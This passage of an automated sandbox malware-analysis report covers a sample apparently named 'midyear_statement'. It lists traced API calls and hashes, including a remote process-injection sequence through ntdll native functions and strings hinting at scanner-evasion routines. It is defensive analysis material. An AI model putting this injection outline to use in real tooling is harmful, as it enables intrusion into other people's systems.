                                                                                                                                                                                            • Part of subcall function 040A5A3C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,040A0000,040CC790), ref: 040A5A76
                                                                                                                                                                                            • Part of subcall function 040A5A3C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,040A0000,040CC790), ref: 040A5A94
                                                                                                                                                                                            • Part of subcall function 040A5A3C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 040A5AB2
                                                                                                                                                                                            • Part of subcall function 040A5A3C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,040A5B41,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 040A5AFB
                                                                                                                                                                                            • Part of subcall function 040A5A3C: RegQueryValueExA.ADVAPI32(?,040A5CA8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,040A5B41,?,80000001), ref: 040A5B19
                                                                                                                                                                                            • Part of subcall function 040A5A3C: RegCloseKey.ADVAPI32(?,040A5B48,00000000,?,?,00000000,040A5B41,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040A5B3B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2796650324-0
                                                                                                                                                                                          • Opcode ID: 1e8a0067773dd6e412028901a4fa07187171c54260f06aed7664556dc4e307ba
                                                                                                                                                                                          • Instruction ID: 12a996b1b8e7ee30d510bb28791240ec58bd873b2b0ce0a002d945365fc033af
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e8a0067773dd6e412028901a4fa07187171c54260f06aed7664556dc4e307ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 39E06D71A002149BDB50DE98DCC0A8633D8BF08658F004A61EC54EF346D7B0E92087D1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A7D58 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 040A7D6C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                                          • Instruction ID: 52774b3f84f1171e691e8d375af7286b86c030b94e62177ac7d2a25286e39511
                                                                                                                                                                                          • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 46D05B723081107AE324965E9C44DF76BECCBC9774F14463AB598C3180D720DC018271
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A4C0C Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SysFreeString.OLEAUT32(040BD6AC), ref: 040A4BDE
                                                                                                                                                                                          • SysReAllocStringLen.OLEAUT32(040CA580,040BD6AC,00000016), ref: 040A4C26
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 344208780-0
                                                                                                                                                                                          • Opcode ID: 5ce10666472a565598d7f4b630483a17b03d11c9dd77ca7b670e171da283bfbe
                                                                                                                                                                                          • Instruction ID: dce062d76d989a1908c2869540f73c9655c93f15aaec98a2c0f237633f5d17ea
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ce10666472a565598d7f4b630483a17b03d11c9dd77ca7b670e171da283bfbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D0127C9201015E6BA85ED59D24B3661DA99D0309F8CC6AC94027E650E7E5F4349621
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A7DD4 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,040BE36F,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,ScanString,04100344,040C9768,UacScan,04100344,040C9768,UacInitialize), ref: 040A7DDF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
                                                                                                                                                                                          • Instruction ID: f73fbd33680711a80eb2cf144c9fbae93e3b5e4de273bd28957837557291925b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: A6C08CA0301200066B90E2FC1CC45A912D8490523C3680F22F469F31E2D623F0362010
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A7DF8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,040C13B4,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,OpenSession,04100344,040C9768,ScanBuffer,04100344,040C9768,ScanString), ref: 040A7E03
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
                                                                                                                                                                                          • Instruction ID: 490ee13a859da315f00ad2c7411a917809b853fdb577ae92a4101d7a4b22aef4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 40C08CB12012000AAFD0E5FC1CC118A42C80A2913C7A41F31E468F32D2D233F8372010
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A4BE8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                                          • Opcode ID: 022aca0795f7a4c93c8e5bd2fafd073bcc6474edabc63fef6319f9c00722eb75
                                                                                                                                                                                          • Instruction ID: b39de8b19916fd1d8d8eb4ea7b243256e8785bdbbff2b128da79d636f064e539
                                                                                                                                                                                          • Opcode Fuzzy Hash: 022aca0795f7a4c93c8e5bd2fafd073bcc6474edabc63fef6319f9c00722eb75
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C012B961023057FBE15AD9ACC0B9262CCDB45298F1400A1D405EB240E2A0F8204390
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040CA288 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • timeSetEvent.WINMM(00002710,00000000,040CA27C,00000000,00000001), ref: 040CA298
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Eventtime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2982266575-0
                                                                                                                                                                                          • Opcode ID: b273326f9a1cac485a09ed5b7e900424ba6793fcde73b8663e9c3194c29aa0b1
                                                                                                                                                                                          • Instruction ID: 9ec49c1490efc6a2c175178baabc2eced6839cf57525832cb8e4779cb825c751
                                                                                                                                                                                          • Opcode Fuzzy Hash: b273326f9a1cac485a09ed5b7e900424ba6793fcde73b8663e9c3194c29aa0b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 24C09BF07943407AF51057F55CC2F6715CCD344714F910016B700FE2C1D1D65D500690
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A4BA8 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,?), ref: 040A4BAF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2525500382-0
                                                                                                                                                                                          • Opcode ID: 5b07472a888e3776e148b0ae0a9523aba3cc3b720f77a61ad4bbe8091deed3d1
                                                                                                                                                                                          • Instruction ID: f22a7355dbeae1e3424c67ce5857e4dcd2f7d0d58d27c575e96b4d3c9e98efe4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b07472a888e3776e148b0ae0a9523aba3cc3b720f77a61ad4bbe8091deed3d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 44B0923C2182015AFA9026E10D10BB600CC4B40299F8400A89E10F80C1FA84E4355032
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A4BC0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 040A4BC7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                                          • Opcode ID: 24956878744e0cf408ac333ce8dc40b9425db7c86dff444b3116ba821e895215
                                                                                                                                                                                          • Instruction ID: 0584f3ea13da8b005e953bac207b7a1cecc09f0377470daac5ea675a1af524fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24956878744e0cf408ac333ce8dc40b9425db7c86dff444b3116ba821e895215
                                                                                                                                                                                          • Instruction Fuzzy Hash: 53A022BC0003038AAF8B33EC88C0AAB20B2BFE030C3C8C0E800003E0008E3AE030A220
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,040A1A03,?,040A1FC1), ref: 040A15E2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: dfda7fd135facca2c38e7fba3a54f7e56dc5e6f3bea506be10989b6148fed9bb
                                                                                                                                                                                          • Instruction ID: aeda5829a8620af802af46099447330a136b98e1615cb43a4b81825dfef5f1b8
                                                                                                                                                                                          • Opcode Fuzzy Hash: dfda7fd135facca2c38e7fba3a54f7e56dc5e6f3bea506be10989b6148fed9bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF049F07017004FEB05DFB99944B05BBD2EB89348F248139D60AEF788F779A8018B00
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,040A1FC1), ref: 040A16A4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: 9f3f59b308a7e04f41ae6fe9c4d931661085e219b9b3b717c5d814a7bf16aa62
                                                                                                                                                                                          • Instruction ID: ad56d60f71d6037d137126188c8dba506070a5a3ecb3ec6c91476db386b85780
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f3f59b308a7e04f41ae6fe9c4d931661085e219b9b3b717c5d814a7bf16aa62
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF0B4B2B04B966BE7119F9A9C80B86FB94FB45318F05413AFA08EB744D778FC108794
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,040A1FE4), ref: 040A1704
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                          • Opcode ID: 865aa495fc3cb2490083d447dcb2339103e786948349c5cc106285c8b8d885e5
                                                                                                                                                                                          • Instruction ID: 7bfa287181a8e721cddc6183991cec1bcf062358947c939923148d457d2d2bdb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 865aa495fc3cb2490083d447dcb2339103e786948349c5cc106285c8b8d885e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: F3E086753003016FE7105AB95D40F5AABD8EB44658F144476F601EF251D264FC208764
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 040BA160 Relevance: 63.1, APIs: 16, Strings: 19, Instructions: 1853librarynativeloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,UacScan,04100344,040BC068,ScanString,04100344,040BC068,ScanBuffer,04100344,040BC068,ScanString,04100344,040BC068,UacScan,04100344), ref: 040BA42F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040BA435
                                                                                                                                                                                            • Part of subcall function 040A2EE0: QueryPerformanceCounter.KERNEL32 ref: 040A2EE4
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,0000007A,00000000,00000000), ref: 040BA810
                                                                                                                                                                                            • Part of subcall function 040B78F8: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040B7905
                                                                                                                                                                                            • Part of subcall function 040B78F8: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B790B
                                                                                                                                                                                            • Part of subcall function 040B78F8: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000040,?,?,0000007A,00000000,00000000), ref: 040BA9AC
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,000000F8,00000000,00000040,?,?,0000007A,00000000,00000000), ref: 040BA9D9
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,?,000000F8,00000000,00000040,?,?,0000007A,00000000,00000000), ref: 040BAA30
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,04100344,040BC068,ScanString,04100344,040BC068,ScanBuffer,04100344,040BC068,ScanBuffer,04100344,040BC068,OpenSession,04100344), ref: 040BB672
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040BB678
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtCreateThreadEx,UacScan,04100344,040BC068,ScanString,04100344,040BC068,?,?,0000007A,00000000,00000000), ref: 040BB877
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040BB87D
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,ScanString,04100344,040BC068,OpenSession,04100344,040BC068,?,?,0000007A,00000000,00000000), ref: 040BBBF4
                                                                                                                                                                                          • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,OpenSession,04100344,040BC068,ScanBuffer,04100344,040BC068,ScanBuffer,04100344,040BC068,OpenSession,04100344,040BC068), ref: 040BBD92
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,0000007A,00000000,00000000), ref: 040BBDA8
                                                                                                                                                                                          • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,0000007A,00000000,00000000), ref: 040BBDAE
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,0000007A,00000000,00000000), ref: 040BBDC6
                                                                                                                                                                                          • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,?,?,0000007A,00000000,00000000), ref: 040BBDCC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
